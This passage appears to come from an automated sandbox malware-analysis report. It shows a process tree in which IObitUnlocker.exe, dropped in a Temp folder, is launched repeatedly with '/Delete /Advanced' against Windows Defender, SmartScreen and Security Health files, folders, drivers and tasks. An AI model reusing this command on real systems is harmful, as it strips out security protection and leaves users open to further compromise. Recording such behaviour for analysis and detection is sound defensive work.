Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6212
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6688
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6748
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2424
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6908
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6584
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6240
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6760
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6976
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6672
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 